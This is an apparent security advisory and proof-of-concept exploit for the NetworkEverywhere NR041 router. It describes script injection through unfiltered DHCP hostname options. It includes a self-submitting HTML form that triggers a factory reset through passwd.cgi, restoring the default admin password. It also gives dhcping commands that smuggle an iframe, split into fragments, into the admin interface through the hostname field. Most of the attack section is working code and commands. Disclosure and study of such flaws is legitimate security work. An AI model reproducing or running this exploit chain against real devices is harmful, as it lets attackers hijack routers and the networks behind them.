networkEverywhere.txt

`  
  
NetworkEverywhere router Model NR041 (latest firmware rev 1.2 Release 03)  
suffers a "script injection over dhcp" vulnerability.  
  
  
The NR041 does not filter DHCP HOSTNAME options coming from its clients.  
Because of that, we can inject a web script into the web based  
administrative interface and wait until the administrator consults the DHCP  
interface after what the injected script is executed within the open session  
and therefore with full access on the router. This exploit allows a  
malicious user to reset the box's factory setting, restoring the default  
password, in this case:  
Administrator: none  
Password: admin.  
  
NR041's dhcp daemon is reachable from the inside and offers no wireless  
access therefore this flaw is not easy to exploit but still, a successful  
exploitation will have critical impact.  
  
EXPLOITATION: (using DHCPing available at  
http://c3rb3r.openwall.net/dhcping/):  
  
  
  
As mentioned above, NR041 is configurable via a web based administrative  
interface using several cgis and invoked with the HTTP POST method.  
It's not easy to write a useful script in 15 characters when you can't break  
the string wherever you wish, the same 'id="' trick used for exploitation of  
the DLINK 614+ will be valuable here.  
  
  
STEP1:  
  
Because we don't have enough room to exploit the router in one shot, we will  
inject an iframe into the router to force the administrator to remotely call  
"a.htm" on the malicious web site.  
"a.htm" contains a form which auto-submit itself when loaded.  
First of all, place the following code on the web server and choose a  
one-character name to save place. This code is installed on the remote  
malicious site and contains the actual attack (a call to passwd.cgi with  
factorydefaults enabled).  
Note that we have hard-coded the router ip (192.168.1.1) in this script (we  
can dynamically get it from the HTTP referer header) so change it  
accordingly to your configuration.  
  
<html><head>  
<script language="JavaScript">  
<!--  
function SymError()  
{  
return true;  
}  
window.onerror = SymError;  
//-->  
</script>  
<script language="javascript">  
function autopost(){  
}  
</script>  
</head><body onload="javascript:document.xx.submit();">  
<form name=xx method=post action="http://192.168.1.1/passwd.cgi">  
<input type=hidden name=FactoryDefaults value="Enable">  
</form>  
</body></html>  
  
  
  
STEP2:  
  
Inject our script into the router using DHCPing :  
  
dhcping -optleasetime 3600 -opttype discover -optreqip  
192.168.1.121 -opthostname "/../a.htm' > " -m af:af:af:af:af:af  
  
dhcping -optleasetime 3600 -opttype discover -optreqip  
192.168.1.122 -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae  
  
dhcping -optleasetime 3600 -opttype discover -optreqip  
192.168.1.123 -opthostname  
"<iframe id=' " -m af:af:af:af:af:ad  
  
(Tested with a Mozilla browser)  
  
  
PROBLEM: Unfortunately we are limited in space for the malicious URL making  
all of this a bit tricky but other means of exploitation may be possible.  
  
Have a nice test ;-)  
  
  
VENDOR:  
  
NetworkEverywhere support staff has been contacted on August 13th but didn't  
reply to my email.  
  
VULNERABLE:  
  
Product Release Date : September 6, 2002  
Current Firmware : Version 1.2 Release 03 (latest)  
Firmware Date : May 5, 2003  
  
  
AUTHOR:  
  
Mathieu Lacroix (Daemonz at videotron.ca)  
Thanks to Gregory Duchemin and DHCPing (available at  
http://c3rb3r.openwall.net/dhcping/)  
  
  
  
  
  
`